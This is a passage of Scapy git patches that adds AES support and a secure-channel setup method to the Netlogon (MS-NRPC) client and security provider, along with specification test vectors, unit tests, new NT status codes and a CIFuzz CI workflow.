ComputeNetlogonSealingKeyRC4( + self.SessionKey, SequenceNumber + ) + Confounder = RC4K(EncryptionKey, signature.Confounder) + # data + handle = RC4Init(EncryptionKey) + for msg in msgs: + if msg.conf_req_flag: + msg.data = RC4(handle, msg.data) # Concatenate the ToSign ToSign = b"".join(x.data for x in msgs if x.sign) - # 3.3.4.2.2 pt 10/11 - Checksum = ComputeNetlogonSignature( - bytes(signature), ToSign, self.SessionKey, Confounder - )[:8] + # 10/11. Signature + if Context.AES: + Checksum = ComputeNetlogonChecksumAES( + bytes(signature), ToSign, self.SessionKey, Confounder + )[:8] + else: + Checksum = ComputeNetlogonChecksumMD5( + bytes(signature), ToSign, self.SessionKey, Confounder + )[:8] if signature.Checksum != Checksum: raise ValueError("ERROR: Checksum don't match") return msgs @@ -319,7 +476,7 @@ def GSS_Init_sec_context( self, Context, val=None, req_flags: Optional[GSS_C_FLAGS] = None ): if Context is None: - Context = self.CONTEXT(True, req_flags=req_flags) + Context = self.CONTEXT(True, req_flags=req_flags, AES=self.AES) if Context.state == self.STATE.INIT: Context.state = self.STATE.CLI_SENT_NL @@ -338,7 +495,7 @@ def GSS_Init_sec_context( def GSS_Accept_sec_context(self, Context, val=None): if Context is None: - Context = self.CONTEXT(False, req_flags=0) + Context = self.CONTEXT(False, req_flags=0, AES=self.AES) if Context.state == self.STATE.INIT: Context.state = self.STATE.SRV_SENT_NL @@ -362,76 +519,153 @@ def MaximumSignatureLength(self, Context: CONTEXT): PFC_SUPPORT_HEADER_SIGN to work properly. """ # len(NL_AUTH_SIGNATURE()) - if Context.AES: - return 48 + if Context.flags & GSS_C_FLAGS.GSS_C_CONF_FLAG: + if Context.AES: + return 56 + else: + return 32 else: - return 32 + if Context.AES: + return 48 + else: + return 24 # --- Utils +class NETLOGON_SECURE_CHANNEL_METHOD(enum.Enum): + NetrServerAuthenticate3 = 1 + NetrServerAuthenticateKerberos = 2 + + class NetlogonClient(DCERPC_Client): + """ + A subclass of DCERPC_Client that supports establishing a Netlogon secure channel + using the Netlogon SSP, and handling Netlogon authenticators. + + This class therefore only supports the 'logon' rpc. + + :param auth_level: one of DCE_C_AUTHN_LEVEL + + :param verb: verbosity control. + :param supportAES: advertise AES support in the Netlogon session. + + Example:: + + >>> cli = NetlogonClient() + >>> cli.connect_and_bind("192.168.0.100") + >>> cli.establishSecureChannel( + ... domainname="DOMAIN", computername="WIN10", + ... HashNT=bytes.fromhex("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"), + ... ) + """ + def __init__( self, auth_level=DCE_C_AUTHN_LEVEL.NONE, - domainname=None, - computername=None, verb=True, + supportAES=True, + **kwargs, ): self.interface = find_dcerpc_interface("logon") self.ndr64 = False # Netlogon doesn't work with NDR64 self.SessionKey = None - self.domainname = domainname - self.computername = computername self.ClientStoredCredential = None + self.supportAES = supportAES super(NetlogonClient, self).__init__( DCERPC_Transport.NCACN_IP_TCP, auth_level=auth_level, ndr64=self.ndr64, verb=verb, + **kwargs, ) def connect_and_bind(self, remoteIP): + """ + This calls DCERPC_Client's connect_and_bind to bind the 'logon' interface. + """ super(NetlogonClient, self).connect_and_bind(remoteIP, self.interface) def alter_context(self): return super(NetlogonClient, self).alter_context(self.interface) def create_authenticator(self): - auth, self.ClientStoredCredential = NewAuthenticatorAndCredential( - self.ClientStoredCredential, self.SessionKey + """ + Create a NETLOGON_AUTHENTICATOR + """ + # [MS-NRPC] sect 3.1.4.5 + ts = int(time.time()) + self.ClientStoredCredential = _credentialAddition( + self.ClientStoredCredential, ts + ) + return PNETLOGON_AUTHENTICATOR( + Credential=PNETLOGON_CREDENTIAL( + data=( + ComputeNetlogonCredentialAES( + self.ClientStoredCredential, + self.SessionKey, + ) + if self.supportAES + else ComputeNetlogonCredentialDES( + self.ClientStoredCredential, + self.SessionKey, + ) + ), + ), + Timestamp=ts, ) - return auth def validate_authenticator(self, auth): + """ + Validate a NETLOGON_AUTHENTICATOR + + :param auth: the NETLOGON_AUTHENTICATOR object + """ + # [MS-NRPC] sect 3.1.4.5 self.ClientStoredCredential = _credentialAddition( self.ClientStoredCredential, 1 ) - tempcred = ComputeNetlogonCredentialDES( - self.ClientStoredCredential, self.SessionKey - ) - assert ( - tempcred == auth.Credential.data - ), "Server netlogon authenticator is wrong !" + if self.supportAES: + tempcred = ComputeNetlogonCredentialAES( + self.ClientStoredCredential, self.SessionKey + ) + else: + tempcred = ComputeNetlogonCredentialDES( + self.ClientStoredCredential, self.SessionKey + ) + if tempcred != auth.Credential.data: + raise ValueError("Server netlogon authenticator is wrong !") - def setSessionKey(self, SessionKey): - self.SessionKey = SessionKey - self.ssp = self.sock.session.ssp = NetlogonSSP( - SessionKey=self.SessionKey, - domainname=self.domainname, - computername=self.computername, - ) + def establishSecureChannel( + self, + computername: str, + domainname: str, + HashNt: bytes, + mode=NETLOGON_SECURE_CHANNEL_METHOD.NetrServerAuthenticate3, + secureChannelType=NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, + ): + """ + Function to establish the Netlogon Secure Channel. - def negotiate_sessionkey(self, secretHash): + This uses NetrServerAuthenticate3 to negotiate the session key, then creates a + NetlogonSSP that uses that session key and alters the DCE/RPC session to use it. + + :param mode: one of NETLOGON_SECURE_CHANNEL_METHOD. This defines which method + to use to establish the secure channel. + :param computername: the netbios computer account name that is used to establish + the secure channel. (e.g. WIN10) + :param domainname: the netbios domain name to connect to (e.g. DOMAIN) + :param HashNt: the HashNT of the computer account. + """ # Flow documented in 3.1.4 Session-Key Negotiation # and sect 3.4.5.2 for specific calls - clientChall = b"12345678" + clientChall = os.urandom(8) # Step 1: NetrServerReqChallenge netr_server_req_chall_response = self.sr1_req( NetrServerReqChallenge_Request( PrimaryName=None, - ComputerName=self.computername, + ComputerName=computername, ClientChallenge=PNETLOGON_CREDENTIAL( data=clientChall, ), @@ -443,48 +677,105 @@ def negotiate_sessionkey(self, secretHash): NetrServerReqChallenge_Response not in netr_server_req_chall_response or netr_server_req_chall_response.status != 0 ): - print(conf.color_theme.fail("! Failure.")) + print( + conf.color_theme.fail( + "! %s" + % STATUS_ERREF.get(netr_server_req_chall_response.status, "Failure") + ) + ) netr_server_req_chall_response.show() - return False - # Step 2: NetrServerAuthenticate3 - serverChall = netr_server_req_chall_response.ServerChallenge.data - SessionKey = ComputeSessionKeyStrongKey(secretHash, clientChall, serverChall) - self.ClientStoredCredential = ComputeNetlogonCredentialDES( - clientChall, SessionKey + raise ValueError + # Calc NegotiateFlags + NegotiateFlags = FlagValue( + 0x602FFFFF, # sensible default (Windows) + names=_negotiateFlags, ) - netr_server_auth3_response = self.sr1_req( - NetrServerAuthenticate3_Request( - PrimaryName=None, - AccountName=self.computername + "$", - SecureChannelType=NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, - ComputerName=self.computername, - ClientCredential=PNETLOGON_CREDENTIAL( - data=self.ClientStoredCredential, - ), - NegotiateFlags=0x600FFFFF, - ndr64=self.ndr64, - ndrendian=self.ndrendian, + if self.supportAES: + NegotiateFlags += "AES" + # We are either using NetrServerAuthenticate3 or NetrServerAuthenticateKerberos + if mode == NETLOGON_SECURE_CHANNEL_METHOD.NetrServerAuthenticate3: + # We use the legacy NetrServerAuthenticate3 function (NetlogonSSP) + # Step 2: Build the session key + serverChall = netr_server_req_chall_response.ServerChallenge.data + if self.supportAES: + SessionKey = ComputeSessionKeyAES(HashNt, clientChall, serverChall) + self.ClientStoredCredential = ComputeNetlogonCredentialAES( + clientChall, SessionKey + ) + else: + SessionKey = ComputeSessionKeyStrongKey( + HashNt, clientChall, serverChall + ) + self.ClientStoredCredential = ComputeNetlogonCredentialDES( + clientChall, SessionKey + ) + netr_server_auth3_response = self.sr1_req( + NetrServerAuthenticate3_Request( + PrimaryName=None, + AccountName=computername + "$", + SecureChannelType=secureChannelType, + ComputerName=computername, + ClientCredential=PNETLOGON_CREDENTIAL( + data=self.ClientStoredCredential, + ), + NegotiateFlags=int(NegotiateFlags), + ndr64=self.ndr64, + ndrendian=self.ndrendian, + ) ) - ) - if ( - NetrServerAuthenticate3_Response not in netr_server_auth3_response - or netr_server_auth3_response.status != 0 - ): - if netr_server_auth3_response.status == 0xC0000022: - print(conf.color_theme.fail("! STATUS_ACCESS_DENIED")) - elif netr_server_auth3_response.status == 0xC000018B: - print(conf.color_theme.fail("! STATUS_NO_TRUST_SAM_ACCOUNT")) + if ( + NetrServerAuthenticate3_Response not in netr_server_auth3_response + or netr_server_auth3_response.status != 0 + ): + NegotiatedFlags = None + if NetrServerAuthenticate3_Response in netr_server_auth3_response: + NegotiatedFlags = FlagValue( + netr_server_auth3_response.NegotiateFlags, + names=_negotiateFlags, + ) + if NegotiateFlags != NegotiatedFlags: + print( + conf.color_theme.fail( + "! Unsupported server flags: %s" + % (NegotiatedFlags ^ NegotiateFlags) + ) + ) + print( + conf.color_theme.fail( + "! %s" + % STATUS_ERREF.get(netr_server_auth3_response.status, "Failure") + ) + ) + if netr_server_auth3_response.status not in STATUS_ERREF: + netr_server_auth3_response.show() + raise ValueError + # Check Server Credential + if self.supportAES: + if ( + netr_server_auth3_response.ServerCredential.data + != ComputeNetlogonCredentialAES(serverChall, SessionKey) + ): + print(conf.color_theme.fail("! Invalid ServerCredential.")) + raise ValueError else: - print(conf.color_theme.fail("! Failure.")) - netr_server_auth3_response.show() - return False - # Check Server Credential - if ( - netr_server_auth3_response.ServerCredential.data - != ComputeNetlogonCredentialDES(serverChall, SessionKey) - ): - print(conf.color_theme.fail("! Invalid ServerCredential.")) - return False - # SessionKey negotiated ! - self.setSessionKey(SessionKey) - return True + if ( + netr_server_auth3_response.ServerCredential.data + != ComputeNetlogonCredentialDES(serverChall, SessionKey) + ): + print(conf.color_theme.fail("! Invalid ServerCredential.")) + raise ValueError + # SessionKey negotiated ! + self.SessionKey = SessionKey + # Create the NetlogonSSP and assign it to the local client + self.ssp = self.sock.session.ssp = NetlogonSSP( + SessionKey=self.SessionKey, + AES=self.supportAES, + domainname=domainname, + computername=computername, + ) + elif mode == NETLOGON_SECURE_CHANNEL_METHOD.NetrServerAuthenticateKerberos: + NegotiateFlags += "Kerberos" + # TODO + raise NotImplementedError + # Finally alter context (to use the SSP) + self.alter_context() diff --git a/scapy/layers/msrpce/rpcclient.py b/scapy/layers/msrpce/rpcclient.py index f377fd20301..2d0f3410602 100644 --- a/scapy/layers/msrpce/rpcclient.py +++ b/scapy/layers/msrpce/rpcclient.py @@ -42,6 +42,7 @@ GSS_S_CONTINUE_NEEDED, GSS_C_FLAGS, ) +from scapy.layers.smb2 import STATUS_ERREF from scapy.layers.smbclient import ( SMB_RPC_SOCKET, ) @@ -210,7 +211,11 @@ def sr1_req(self, pkt, **kwargs): ) ) else: - print(conf.color_theme.fail("! Failure")) + print( + conf.color_theme.fail( + "! %s" % STATUS_ERREF.get(resp.status, "Failure") + ) + ) resp.show() return return resp @@ -425,7 +430,11 @@ def _bind(self, interface, reqcls, respcls): ) ) else: - print(conf.color_theme.fail("! Failure")) + print( + conf.color_theme.fail( + "! %s" % STATUS_ERREF.get(resp.status, "Failure") + ) + ) resp.show() if DceRpc5Fault in resp: if resp[DceRpc5Fault].payload and not isinstance( diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 7f39c2332e4..e45e2d2fa1a 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -113,6 +113,7 @@ 0xC0000034: "STATUS_OBJECT_NAME_NOT_FOUND", 0xC0000043: "STATUS_SHARING_VIOLATION", 0xC0000061: "STATUS_PRIVILEGE_NOT_HELD", + 0xC0000064: "STATUS_NO_SUCH_USER", 0xC000006D: "STATUS_LOGON_FAILURE", 0xC000006E: "STATUS_ACCOUNT_RESTRICTION", 0xC0000071: "STATUS_PASSWORD_EXPIRED", @@ -123,8 +124,10 @@ 0xC00000C9: "STATUS_NETWORK_NAME_DELETED", 0xC00000CC: "STATUS_BAD_NETWORK_NAME", 0xC0000120: "STATUS_CANCELLED", + 0xC0000122: "STATUS_INVALID_COMPUTER_NAME", 0xC0000128: "STATUS_FILE_CLOSED", # backup error for older Win versions 0xC000015B: "STATUS_LOGON_TYPE_NOT_GRANTED", + 0xC000018B: "STATUS_NO_TRUST_SAM_ACCOUNT", 0xC000019C: "STATUS_FS_DRIVER_REQUIRED", 0xC0000203: "STATUS_USER_SESSION_DELETED", 0xC000020C: "STATUS_CONNECTION_DISCONNECTED", diff --git a/test/scapy/layers/msnrpc.uts b/test/scapy/layers/msnrpc.uts index 88cb74d1e89..14cb773f49b 100644 --- a/test/scapy/layers/msnrpc.uts +++ b/test/scapy/layers/msnrpc.uts @@ -1,5 +1,89 @@ % MS-NRPC tests ++ [MS-NRPC] test vectors + += [MS-NRPC] test vectors - sect 4.2 + +from scapy.layers.tls.crypto.hash import Hash_MD4 +from scapy.layers.msrpce.msnrpc import ComputeSessionKeyStrongKey + +# Clear-text SharedSecret: +ClearSharedSecret = bytes.fromhex("2e002f002c006e004c003e004f004c005a003600730074005e0058004b0065004d0025002e0049002d00740045006000570056006a0043005b00300036003f005d003a00510076005f0054006e0055006f003a003a00420077002c0067006000760023004a004d0036004d007100530050007500550028006e00710034003e0079006a005b0064005c002b005600700052005f00790078007500630021006700300054003600350076007a005700410042005f004200220069003c003c0053002b00340027005e003a0021002c003b002500470073002d00280022003a0020006d003e00210043004c0066006e004e00") + +# OWF of SharedSecret: +SharedSecret = Hash_MD4().digest(ClearSharedSecret) +assert SharedSecret.hex() == "31a590170a351fd51148b2a10af2c305" + +# Client Challenge: + +ClientChallenge = bytes.fromhex("3a0390a46d0c3d4f") + +# Server Challenge: +ServerChallenge = bytes.fromhex("0c4c13d16041c860") + +# Session Key: +assert ComputeSessionKeyStrongKey(SharedSecret, ClientChallenge, ServerChallenge).hex() == "eefe8f40007a2eeb6843d0d30a5be2e3" + += [MS-NRPC] test vectors - sect 4.3 + +import mock +from scapy.layers.msrpce.msnrpc import NetlogonSSP + +# Input +SessionKey = bytes.fromhex("0cb6948805f797bf2a82807973b89537") +Confounder = bytes.fromhex("717f5076c5902bcd") +ClearTextMessage = bytes.fromhex("3000000000000000000000000000000030000000000000005c005c00570049004e002d00450055003400550047003800370048003200490056002e00320033003000360066006500760032002e006e00740074006500730074002e006d006900630072006f0073006f00660074002e0063006f006d0000000000020000000000100000000000000000000000000000001000000000000000570049004e002d004400310049005400420046004d003400410038005500000085bb1511fd09786d3b61b06400000000000000000000000001000000000000000000000000000000") +# Expected +FullNetlogonSignatureHeader = bytes.fromhex("13001a00ffff0000b37c1f0ec86468f086761f2f86f4f4c1632d1f547d2cf6ff") +EncryptedMessage = bytes.fromhex("c930c9a079d95c78bea6a3150908c11f4b68e41219bcb91680ead287da211eec66bc27df2bc9a0f4ecf25c88624e493c59cdec6bc7b08bed84b97c33138ae3c8377cb327f3ea6076da91c5d23dbf1b2f4066a455332716b7b64f2ec9a944702d20a85035de3b231a5216b7a6c9102bd17c7d6ab1b379445eb5a5276e360d3bcef93b5359d36b0006b0c10bc2fec73777816a383a4614494b7b18bc34cd5447681eb48f8132a0a08a50d752826cff068c76959d49767557e503d509fa3c18b0860a22a7e2bae50e812c5d71c31f9f1dfd143333b3043f6bf906e5d91207f1d988") + +# Perform the same operation using NetlogonSSP: + +client = NetlogonSSP(SessionKey=SessionKey, computername="DC1", domainname="DOMAIN", AES=True) +clicontext, tok, negResult = client.GSS_Init_sec_context(None) + +with mock.patch('scapy.layers.msrpce.msnrpc.os.urandom', side_effect=lambda x: Confounder): + _msgs, sig = client.GSS_WrapEx( + clicontext, + [ + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=ClearTextMessage), + ] + ) + +assert _msgs[0].data == EncryptedMessage +assert bytes(sig)[:len(FullNetlogonSignatureHeader)] == FullNetlogonSignatureHeader + += [MS-NRPC] test vectors - sect 4.3.1 + +import mock +from scapy.layers.msrpce.msnrpc import NetlogonSSP + +# Input +RpcPDUHeader = bytes.fromhex("0500000310000000380138000c000000d400000001001500") +RpcSecTrailer = bytes.fromhex("44060c0003000000") +# Expected +FullNetlogonSignatureHeader = bytes.fromhex("13001a00ffff00005d69950dfde45ae9f092ae5c3c55aacd632d1f547d2cf6ff") + +# Perform the same operation using NetlogonSSP: + +client = NetlogonSSP(SessionKey=SessionKey, computername="DC1", domainname="DOMAIN", AES=True) +clicontext, tok, negResult = client.GSS_Init_sec_context(None) + +with mock.patch('scapy.layers.msrpce.msnrpc.os.urandom', side_effect=lambda x: Confounder): + _msgs, sig = client.GSS_WrapEx( + clicontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=RpcPDUHeader), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=ClearTextMessage), + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=RpcSecTrailer), + ] + ) + +assert _msgs[0].data == RpcPDUHeader +assert _msgs[1].data == EncryptedMessage +assert _msgs[2].data == RpcSecTrailer +assert bytes(sig)[:len(FullNetlogonSignatureHeader)] == FullNetlogonSignatureHeader + + Dissect and Build full NRPC exchange # XXX in the DCE/RPC spec + MS-RPCE, padding is only supposed to be zeros @@ -10,17 +94,17 @@ # to make the output match, but it would be cool to reverse engineer the ndr lib in windows and copy # exactly the same debug values -= Load MSRPCE and bind += [EXCH] - Load MSRPCE and bind load_layer("msrpce") bind_layers(TCP, DceRpc, sport=40564) # the DCE/RPC port bind_layers(TCP, DceRpc, dport=40564) -= Parse NRPC exchange (pcap) += [EXCH] - Parse NRPC exchange (pcap) pkts = sniff(offline=scapy_path('test/pcaps/dcerpc_msnrpc.pcapng.gz'), session=DceRpcSession) -= Check ept_map_Request += [EXCH] - Check ept_map_Request from scapy.layers.msrpce.ept import * @@ -34,7 +118,7 @@ twr = protocol_tower_t(epm_req.map_tower.value.tower_octet_string) assert twr.count == 5 assert twr.floors[0].sprintf("%uuid%") == 'logon' -= Re-build ept_map_Request from scratch += [EXCH] - Re-build ept_map_Request from scratch pkt = ept_map_Request( entry_handle=NDRContextHandle(attributes=0, uuid=b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'), @@ -52,7 +136,7 @@ pkt = ept_map_Request( output = bytearray(bytes(pkt)) assert bytes(output) == bytes(epm_req) -= Check ept_map_Response += [EXCH] - Check ept_map_Response epm_resp = pkts[3][DceRpc5].payload.payload @@ -74,7 +158,7 @@ assert twr.floors[3].rhs == 49676 assert twr.floors[4].sprintf("%protocol_identifier%") == "IP" assert twr.floors[4].rhs == "192.168.122.17" -= Re-build ept_map_Response from scratch += [EXCH] - Re-build ept_map_Response from scratch pkt = ept_map_Response( entry_handle=NDRContextHandle(attributes=0), @@ -89,14 +173,14 @@ pkt.ITowers.value[0].value[1].referent_id = 0x4 pkt.ITowers.max_count = 4 assert bytes(pkt) == bytes(epm_resp) -= Check NetrServerReqChallenge_Request += [EXCH] - Check NetrServerReqChallenge_Request chall_req = pkts[6][NetrServerReqChallenge_Request] assert chall_req.valueof("ComputerName") == b"WIN1" assert chall_req.PrimaryName is None assert chall_req.ClientChallenge.data == b"12345678" -= Re-build NetrServerReqChallenge_Request from scratch += [EXCH] - Re-build NetrServerReqChallenge_Request from scratch pkt = NetrServerReqChallenge_Request( ComputerName=b'WIN1', @@ -106,13 +190,13 @@ pkt = NetrServerReqChallenge_Request( assert bytes(pkt) == bytes(chall_req) -= Check NetrServerReqChallenge_Response += [EXCH] - Check NetrServerReqChallenge_Response chall_resp = pkts[7][NetrServerReqChallenge_Response] assert chall_resp.ServerChallenge.data == b'Zq/\xc4D\xfeRI' assert chall_resp.status == 0 -= Re-build NetrServerReqChallenge_Response from scratch += [EXCH] - Re-build NetrServerReqChallenge_Response from scratch pkt = NetrServerReqChallenge_Response( ServerChallenge=PNETLOGON_CREDENTIAL(data=b'Zq/\xc4D\xfeRI') @@ -120,7 +204,7 @@ pkt = NetrServerReqChallenge_Response( assert bytes(pkt) == bytes(chall_resp) -= Check NetrServerAuthenticate3_Request += [EXCH] - Check NetrServerAuthenticate3_Request auth_req = pkts[8][NetrServerAuthenticate3_Request] assert auth_req.PrimaryName is None @@ -130,7 +214,7 @@ assert auth_req.valueof("ComputerName") == b"WIN1" assert auth_req.ClientCredential.data == b'd:\xb3p\xc6\x9e\xf40' assert auth_req.NegotiateFlags == 1611661311 -= Re-build NetrServerAuthenticate3_Request from scratch += [EXCH] - Re-build NetrServerAuthenticate3_Request from scratch pkt = NetrServerAuthenticate3_Request( AccountName=b'WIN1$', @@ -144,7 +228,7 @@ pkt = NetrServerAuthenticate3_Request( output = bytearray(bytes(pkt)) assert bytes(output) == bytes(auth_req) -= Check NetrServerAuthenticate3_Response += [EXCH] - Check NetrServerAuthenticate3_Response auth_resp = pkts[9][NetrServerAuthenticate3_Response] assert auth_resp.ServerCredential.data == b'1h\x8d\xb8\xf4zH\xaf' @@ -152,7 +236,7 @@ assert auth_resp.NegotiateFlags == 1611661311 assert auth_resp.AccountRid == 1105 assert auth_resp.status == 0 -= Re-build NetrServerAuthenticate3_Response from scratch += [EXCH] - Re-build NetrServerAuthenticate3_Response from scratch pkt = NetrServerAuthenticate3_Response( ServerCredential=PNETLOGON_CREDENTIAL(data=b'1h\x8d\xb8\xf4zH\xaf'), @@ -166,7 +250,7 @@ assert bytes(pkt) == bytes(auth_resp) + GSS-API NetlogonSSP tests ~ mock -= Create randomness-mock context manager += [NetlogonSSP] - Create randomness-mock context manager # mock the random to get consistency import mock @@ -188,14 +272,14 @@ class NetlogonRandomPatcher: for p in _patches: p.stop() -= Create client and server NetlogonSSP += [NetlogonSSP] - RC4 - Create client and server NetlogonSSP from scapy.layers.msrpce.msnrpc import NetlogonSSP, NL_AUTH_MESSAGE -client = NetlogonSSP(SessionKey=b"\x00\x00\x00\x00\x00\x00\x00\x00", computername="DC1", domainname="DOMAIN") -server = NetlogonSSP(SessionKey=b"\x00\x00\x00\x00\x00\x00\x00\x00", computername="DC1", domainname="DOMAIN") +client = NetlogonSSP(SessionKey=b"\x00\x00\x00\x00\x00\x00\x00\x00", computername="DC1", domainname="DOMAIN", AES=False) +server = NetlogonSSP(SessionKey=b"\x00\x00\x00\x00\x00\x00\x00\x00", computername="DC1", domainname="DOMAIN", AES=False) -= GSS_Init_sec_context (NL_AUTH_MESSAGE) += [NetlogonSSP] - RC4 - GSS_Init_sec_context (NL_AUTH_MESSAGE) clicontext, tok, negResult = client.GSS_Init_sec_context(None) @@ -207,7 +291,7 @@ assert tok.Flags == 3 bytes(tok) assert bytes(tok) == b'\x00\x00\x00\x00\x03\x00\x00\x00DOMAIN\x00DC1\x00' -= GSS_Accept_sec_context (NL_AUTH_MESSAGE->NL_AUTH_MESSAGE) += [NetlogonSSP] - RC4 - GSS_Accept_sec_context (NL_AUTH_MESSAGE->NL_AUTH_MESSAGE) srvcontext, tok, negResult = server.GSS_Accept_sec_context(None, tok) @@ -217,14 +301,14 @@ assert tok.MessageType == 1 bytes(tok) assert bytes(tok) == b'\x01\x00\x00\x00\x00\x00\x00\x00' -= GSS_Init_sec_context (NL_AUTH_MESSAGE->OK) += [NetlogonSSP] - RC4 - GSS_Init_sec_context (NL_AUTH_MESSAGE->OK) clicontext, tok, negResult = client.GSS_Init_sec_context(clicontext, tok) assert negResult == 0 assert tok is None -= GSS_WrapEx/GSS_UnwrapEx: client sends a encrypted payload += [NetlogonSSP] - RC4 - GSS_WrapEx/GSS_UnwrapEx: client sends a encrypted payload data_header = b"header" # signed but not encrypted data = b"testAAAAAAAAAABBBBBBBBBCCCCCCCCCDDDDDDDDDEEEEEEEEE" # encrypted @@ -252,7 +336,7 @@ decrypted = server.GSS_UnwrapEx( )[1].data assert decrypted == data -= GSS_WrapEx/GSS_UnwrapEx: server answers back += [NetlogonSSP] - RC4 - GSS_WrapEx/GSS_UnwrapEx: server answers back with NetlogonRandomPatcher(): _msgs, sig = server.GSS_WrapEx( @@ -277,7 +361,120 @@ decrypted = client.GSS_UnwrapEx( )[1].data assert decrypted == data -= GSS_WrapEx/GSS_UnwrapEx: inject fault += [NetlogonSSP] - RC4 - GSS_WrapEx/GSS_UnwrapEx: inject fault + +_msgs, sig = client.GSS_WrapEx( + clicontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data) + ] +) +encrypted = _msgs[1].data +assert encrypted != data +bad_data_header = data_header[:-3] + b"hey" +try: + server.GSS_UnwrapEx(srvcontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=bad_data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=encrypted), + ], + sig + ) + assert False, "No error was reported, but there should have been one" +except ValueError: + pass + += [NetlogonSSP] - AES - Create client and server NetlogonSSP + +from scapy.layers.msrpce.msnrpc import NetlogonSSP, NL_AUTH_MESSAGE + +client = NetlogonSSP(SessionKey=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", computername="DC1", domainname="DOMAIN", AES=True) +server = NetlogonSSP(SessionKey=b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", computername="DC1", domainname="DOMAIN", AES=True) + += [NetlogonSSP] - AES - GSS_Init_sec_context (NL_AUTH_MESSAGE) + +clicontext, tok, negResult = client.GSS_Init_sec_context(None) + +assert negResult == 1 +assert isinstance(tok, NL_AUTH_MESSAGE) +assert tok.MessageType == 0 +assert tok.Flags == 3 + +bytes(tok) +assert bytes(tok) == b'\x00\x00\x00\x00\x03\x00\x00\x00DOMAIN\x00DC1\x00' + += [NetlogonSSP] - AES - GSS_Accept_sec_context (NL_AUTH_MESSAGE->NL_AUTH_MESSAGE) + +srvcontext, tok, negResult = server.GSS_Accept_sec_context(None, tok) + +assert negResult == 0 +assert tok.MessageType == 1 + +bytes(tok) +assert bytes(tok) == b'\x01\x00\x00\x00\x00\x00\x00\x00' + += [NetlogonSSP] - AES - GSS_Init_sec_context (NL_AUTH_MESSAGE->OK) + +clicontext, tok, negResult = client.GSS_Init_sec_context(clicontext, tok) + +assert negResult == 0 +assert tok is None + += [NetlogonSSP] - AES - GSS_WrapEx/GSS_UnwrapEx: client sends a encrypted payload + +data_header = b"header" # signed but not encrypted +data = b"testAAAAAAAAAABBBBBBBBBCCCCCCCCCDDDDDDDDDEEEEEEEEE" # encrypted + +with NetlogonRandomPatcher(): + _msgs, sig = client.GSS_WrapEx( + clicontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data) + ] + ) + +encrypted = _msgs[1].data +assert bytes(encrypted) == b'\xbf\x1aP\xb4\xb54\xe4^\x1a\xfe\xf3\x1f(\xfa[\xc4\x06\xdb_\x1a9\x90P' +assert bytes(sig) == b'\x13\x00\x1a\x00\xff\xff\x00\x00.\n\x8e\xcf\xbek \x84\x978\xe2\xad\x8c\xdd\x8efS\x9b\xf3DG\xf4[\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + +decrypted = client.GSS_UnwrapEx( + clicontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=re_encrypted), + ], + sig +)[1].data +assert decrypted == data + += [NetlogonSSP] - AES - GSS_WrapEx/GSS_UnwrapEx: inject fault _msgs, sig = client.GSS_WrapEx( clicontext, From 37d941267e4cd0755315fe089c9f4d3fb9a11849 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Mon, 1 Jul 2024 21:28:11 +0300 Subject: [PATCH 1314/1632] ci: run the fuzz target on PRs (#4378) * ci: run the fuzz target on PRs using https://google.github.io/oss-fuzz/getting-started/continuous-integration/ It downloads the corpus OSS-Fuzz has accumulated so far (including the test cases that triggered issues in the past) and runs the fuzz target with it. It should help to catch most regressions when PRs are opened. Prompted by https://github.com/secdev/scapy/pull/4373. * dcerpc: turn print into log_runtime.warning to make it possible to turn it off with logging.disable(). (it should help to make the fuzz target less chatty among other things because it seems to be the only dissector (covered by the fuzz target) printing messages like that directly) --- .github/workflows/cifuzz.yml | 39 ++++++++++++++++++++++++++++++++++++ scapy/layers/dcerpc.py | 2 +- 2 files changed, 40 insertions(+), 1 deletion(-) create mode 100644 .github/workflows/cifuzz.yml diff --git a/.github/workflows/cifuzz.yml b/.github/workflows/cifuzz.yml new file mode 100644 index 00000000000..3e173be1825 --- /dev/null +++ b/.github/workflows/cifuzz.yml @@ -0,0 +1,39 @@ +name: CIFuzz + +on: + pull_request: + branches: [master] + +permissions: + contents: read + +jobs: + Fuzzing: + runs-on: ubuntu-latest + if: github.repository == 'secdev/scapy' + concurrency: + group: ${{ github.workflow }}-${{ github.ref }} + cancel-in-progress: true + + steps: + - name: Build Fuzzers + id: build + uses: google/oss-fuzz/infra/cifuzz/actions/build_fuzzers@master + with: + oss-fuzz-project-name: 'scapy' + language: python + dry-run: false + allowed-broken-targets-percentage: 0 + - name: Run Fuzzers + uses: google/oss-fuzz/infra/cifuzz/actions/run_fuzzers@master + with: + oss-fuzz-project-name: 'scapy' + language: python + dry-run: false + fuzz-seconds: 300 + - name: Upload Crash + uses: actions/upload-artifact@v4 + if: failure() && steps.build.outcome == 'success' + with: + name: artifacts + path: ./out/artifacts diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index 58dcd1534b4..bd3b12c030e 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -3000,7 +3000,7 @@ def dispatch_hook(cls, _pkt, _underlayer=None, *args, **kargs): for klass in 